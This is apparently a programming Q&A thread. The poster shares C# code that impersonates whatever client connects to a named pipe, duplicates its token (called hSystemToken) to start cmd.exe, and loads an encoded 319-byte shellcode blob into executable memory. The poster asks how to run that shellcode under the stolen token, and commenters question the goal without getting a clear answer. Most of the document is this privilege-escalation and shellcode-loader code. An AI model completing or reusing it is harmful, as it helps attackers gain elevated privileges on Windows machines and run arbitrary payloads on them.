# How to use an available token to create a new thread in C#?

Tags: c#

This code tries to impersonate token of any client that connects to the named pipe that is provided as argument to the code. After receiving the token in `hSystemtoken`, this token would be used to call `CreateProcessWithTokenW`. However I also want to call the shellcode using this token. What is the way to achieve this?

`CreateProcessThread`  is one way to start a thread. Looking through the documentation I also understand there is a function `SetThreadToken` which I tried in my code but that did not work. Is there a simpler way to do this?

```cs
using System;
using System.Runtime.InteropServices;

namespace console_csharp
{

    [StructLayout(LayoutKind.Sequential)]
    public struct SID_AND_ATTRIBUTES
    {
        public IntPtr Sid;
        public int Attributes;
    }
    public struct TOKEN_USER
    {
        public SID_AND_ATTRIBUTES User;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO
    {
        public Int32 cb;
        public string lpReserved;
        public string lpDesktop;
        public string lpTitle;
        public Int32 dwX;
        public Int32 dwY;
        public Int32 dwXSize;
        public Int32 dwYSize;
        public Int32 dwXCountChars;
        public Int32 dwYCountChars;
        public Int32 dwFillAttribute;
        public Int32 dwFlags;
        public Int16 wShowWindow;
        public Int16 cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }


    class Program
    {
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        [DllImport("kernel32.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern IntPtr CreateNamedPipe(string lpName, uint dwOpenMode,
        uint dwPipeMode, uint nMaxInstances, uint nOutBufferSize, uint nInBufferSize,
        uint nDefaultTimeOut, IntPtr lpSecurityAttributes);

        [DllImport("kernel32.dll")]
        static extern bool ConnectNamedPipe(IntPtr hNamedPipe, IntPtr lpOverlapped);

        [DllImport("Advapi32.dll")]
        static extern bool ImpersonateNamedPipeClient(IntPtr hNamedPipe);

        [DllImport("kernel32.dll")]
        private static extern IntPtr GetCurrentThread();
        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool OpenThreadToken(IntPtr ThreadHandle, uint DesiredAccess, bool
        OpenAsSelf, out IntPtr TokenHandle);

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool GetTokenInformation(IntPtr TokenHandle, uint TokenInformationClass,
        IntPtr TokenInformation, int TokenInformationLength, out int ReturnLength);

        [DllImport("advapi32", CharSet = CharSet.Auto, SetLastError = true)]
        static extern bool ConvertSidToStringSid(IntPtr pSID, out IntPtr ptrSid);

        [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public extern static bool DuplicateTokenEx(
            IntPtr hExistingToken,
            uint dwDesiredAccess,
            IntPtr lpTokenAttributes,
            uint ImpersonationLevel,
            uint TokenType,
            out IntPtr phNewToken);

        [DllImport("advapi32", SetLastError = true, CharSet = CharSet.Unicode)]
        public static extern bool CreateProcessWithTokenW(
            IntPtr hToken,
            UInt32 dwLogonFlags,
            string lpApplicationName,
            string lpCommandLine,
            UInt32 dwCreationFlags,
            IntPtr lpEnvironment,
            string lpCurrentDirectory,
            [In] ref STARTUPINFO lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);

        // SetThreadToken
        [System.Runtime.InteropServices.DllImport("advapi32.dll", SetLastError = true)]
        private static extern bool SetThreadToken(IntPtr pHandle, IntPtr hToken);
        static void Main(string[] args)
        {
           
            //brings up calc
            byte[] buf = new byte[319] {
                0x48,0x31,0xc9,0x48,0x81,0xe9,0xdd,0xff,0xff,0xff,0x48,0x8d,0x05,0xef,0xff,
                0xff,0xff,0x48,0xbb,0xb6,0x91,0x18,0x2b,0x1c,0x05,0x92,0x1b,0x48,0x31,0x58,
                0x27,0x48,0x2d,0xf8,0xff,0xff,0xff,0xe2,0xf4,0x4a,0xd9,0x9b,0xcf,0xec,0xed,
                0x52,0x1b,0xb6,0x91,0x59,0x7a,0x5d,0x55,0xc0,0x4a,0xe0,0xd9,0x29,0xf9,0x79,
                0x4d,0x19,0x49,0xd6,0xd9,0x93,0x79,0x04,0x4d,0x19,0x49,0x96,0xd9,0x93,0x59,
                0x4c,0x4d,0x9d,0xac,0xfc,0xdb,0x55,0x1a,0xd5,0x4d,0xa3,0xdb,0x1a,0xad,0x79,
                0x57,0x1e,0x29,0xb2,0x5a,0x77,0x58,0x15,0x6a,0x1d,0xc4,0x70,0xf6,0xe4,0xd0,
                0x49,0x63,0x97,0x57,0xb2,0x90,0xf4,0xad,0x50,0x2a,0xcc,0x8e,0x12,0x93,0xb6,
                0x91,0x18,0x63,0x99,0xc5,0xe6,0x7c,0xfe,0x90,0xc8,0x7b,0x97,0x4d,0x8a,0x5f,
                0x3d,0xd1,0x38,0x62,0x1d,0xd5,0x71,0x4d,0xfe,0x6e,0xd1,0x6a,0x97,0x31,0x1a,
                0x53,0xb7,0x47,0x55,0x1a,0xd5,0x4d,0xa3,0xdb,0x1a,0xd0,0xd9,0xe2,0x11,0x44,
                0x93,0xda,0x8e,0x71,0x6d,0xda,0x50,0x06,0xde,0x3f,0xbe,0xd4,0x21,0xfa,0x69,
                0xdd,0xca,0x5f,0x3d,0xd1,0x3c,0x62,0x1d,0xd5,0xf4,0x5a,0x3d,0x9d,0x50,0x6f,
                0x97,0x45,0x8e,0x52,0xb7,0x41,0x59,0xa0,0x18,0x8d,0xda,0x1a,0x66,0xd0,0x40,
                0x6a,0x44,0x5b,0xcb,0x41,0xf7,0xc9,0x59,0x72,0x5d,0x5f,0xda,0x98,0x5a,0xb1,
                0x59,0x79,0xe3,0xe5,0xca,0x5a,0xef,0xcb,0x50,0xa0,0x0e,0xec,0xc5,0xe4,0x49,
                0x6e,0x45,0x63,0xa6,0x04,0x92,0x1b,0xb6,0x91,0x18,0x2b,0x1c,0x4d,0x1f,0x96,
                0xb7,0x90,0x18,0x2b,0x5d,0xbf,0xa3,0x90,0xd9,0x16,0xe7,0xfe,0xa7,0xf5,0x27,
                0xb9,0xe0,0xd0,0xa2,0x8d,0x89,0xb8,0x0f,0xe4,0x63,0xd9,0x9b,0xef,0x34,0x39,
                0x94,0x67,0xbc,0x11,0xe3,0xcb,0x69,0x00,0x29,0x5c,0xa5,0xe3,0x77,0x41,0x1c,
                0x5c,0xd3,0x92,0x6c,0x6e,0xcd,0x48,0x7d,0x69,0xf1,0x35,0xd3,0xe9,0x7d,0x2b,
                0x1c,0x05,0x92,0x1b };

            int size = buf.Length;
            IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
            Marshal.Copy(buf, 0, addr, size);
            //IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0,IntPtr.Zero);
            //WaitForSingleObject(hThread, 0xFFFFFFFF);

            string pipeName = args[0];
            IntPtr hPipe = CreateNamedPipe(pipeName, 3, 0, 10, 0x1000, 0x1000, 0, IntPtr.Zero);
            ConnectNamedPipe(hPipe, IntPtr.Zero);
            ImpersonateNamedPipeClient(hPipe);

            IntPtr hToken;
            OpenThreadToken(GetCurrentThread(), 0xF01FF, false, out hToken);

            int TokenInfLength = 0;
            GetTokenInformation(hToken, 1, IntPtr.Zero, TokenInfLength, out TokenInfLength);
            IntPtr TokenInformation = Marshal.AllocHGlobal((IntPtr)TokenInfLength);
            GetTokenInformation(hToken, 1, TokenInformation, TokenInfLength, out TokenInfLength);

            TOKEN_USER TokenUser = (TOKEN_USER)Marshal.PtrToStructure(TokenInformation, typeof(TOKEN_USER));
            IntPtr pstr = IntPtr.Zero;
            Boolean ok = ConvertSidToStringSid(TokenUser.User.Sid, out pstr);
            string sidstr = Marshal.PtrToStringAuto(pstr);
            Console.WriteLine(@"Found sid {0}", sidstr);

            // phNewToken will be the handle to new token
            IntPtr hSystemToken = IntPtr.Zero;
            DuplicateTokenEx(hToken, 0xF01FF, IntPtr.Zero, 2, 1, out hSystemToken);

            // using that process to start a cmd.exe
            PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
            STARTUPINFO si = new STARTUPINFO();
            si.cb = Marshal.SizeOf(si);
            CreateProcessWithTokenW(hSystemToken, 0, null, "C:\\Windows\\System32\\cmd.exe", 0, IntPtr.Zero, null, ref si, out pi);

            // lets try call thread with token now

            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            SetThreadToken(hThread, hSystemToken);
            WaitForSingleObject(hThread, 0xFFFFFFFF);

        }
    }
}
```

thanks

Comment: What is the actual goal you are trying to accomplish? What 'token' are you talking about? If you are asking about impersonation you should probably describe why [how-do-you-do-impersonation-in-net](https://stackoverflow.com/questions/125341/how-do-you-do-impersonation-in-net) is not sufficient for your purposes.

Comment: Added code for more clarity @JonasH. The link you have provided does not work for me because I am not using `System.Security.Principal` namespace.

Comment: You still have not described you *actual* goal. Are you installing something? Configuring a webserver? what? "Not using that namespace" - *Why* ? Does that API not support what you want to do? not available on your platform? something else?

Comment: Hi @JonasH, I fail to understand what actual goal has to do with the problem at hand, what I present to you is a C# code snippet and what it aims to do.  I want to know if I am using SetToken and CreateProcess correctly here or is there some security descriptor that I missed. Token impersonation can be done through various methods, however can you tell me if there is something wrong how I have used WinAPIs here? Thanks for your persistent interest. I would change my question for more details.

Comment: The actual goal is important because the [Xy-Problem](https://xyproblem.info/) is common on SO. Without knowing what your actual goal is we cannot recommend some other solution that is better for what you are actually trying to do.